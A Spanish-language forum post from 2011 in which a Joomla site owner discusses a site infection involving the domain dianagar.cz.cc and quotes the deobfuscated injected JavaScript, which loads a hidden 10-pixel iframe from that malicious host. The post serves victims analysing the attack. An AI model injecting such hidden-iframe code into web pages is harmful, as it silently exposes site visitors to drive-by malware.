Ver Mensaje Individual
  #4 (permalink)  
Antiguo 27/01/2011, 16:09
piku
 
Fecha de Ingreso: enero-2011
Mensajes: 4
Antigüedad: 13 años, 10 meses
Puntos: 0
Respuesta: Pagina web infectada con dianagar.cz.cc ?!

Bueno yo tengo

Joomla 1.5.x (no recuerdo cual)
y los servicios basicos del proveedor: ftp, etc

Es que no me queda claro la entrada, si es por ftp o por tener joomla desactualizado porque también hay gente que no tiene joomla y ha sufrido el ataque.


Cita:
Iniciado por piku Ver Mensaje
A mi también me ha pasado... Es seguro que han accedido por FTP? ... Que servidor utilizas? Yo ando un poco perdido... Por de pronto he desofuscado el codigo inyectado.... lo pego a continuación.

Es un intento de cargar un iframe oculto con un enlace a una web maliciosa
if( document.getElementsByTagName('body')[0] )
{
iframer();
}
else
{
var bdy = document.createElement( "body" );
try
{
document.appendChild(bdy);
}
catch (e)
{
document.body = bdy;
}

if( document.getElementsByTagName('body')[0] )
{
iframer();
}
else
{
document.write("<iframe src='http://dianagar.cz.cc/in.php?a=QQkFBg0CBAcNBgIMEkcJBQYNAgQCBQIMBw==' width='10' height='10' style='visibility:hidden;position:absolute;left:0; top:0;'></iframe>");
}
}

function iframer()
{
var f = document.createElement('iframe');
f.setAttribute('src','http://dianagar.cz.cc/in.php?a=QQkFBg0CBAcNBgIMEkcJBQYNAgQCBQIMBw==');
f.style.visibility='hidden';
f.style.position='absolute';
f.style.left='0';
f.style.top='0';
f.setAttribute('width','10');
f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}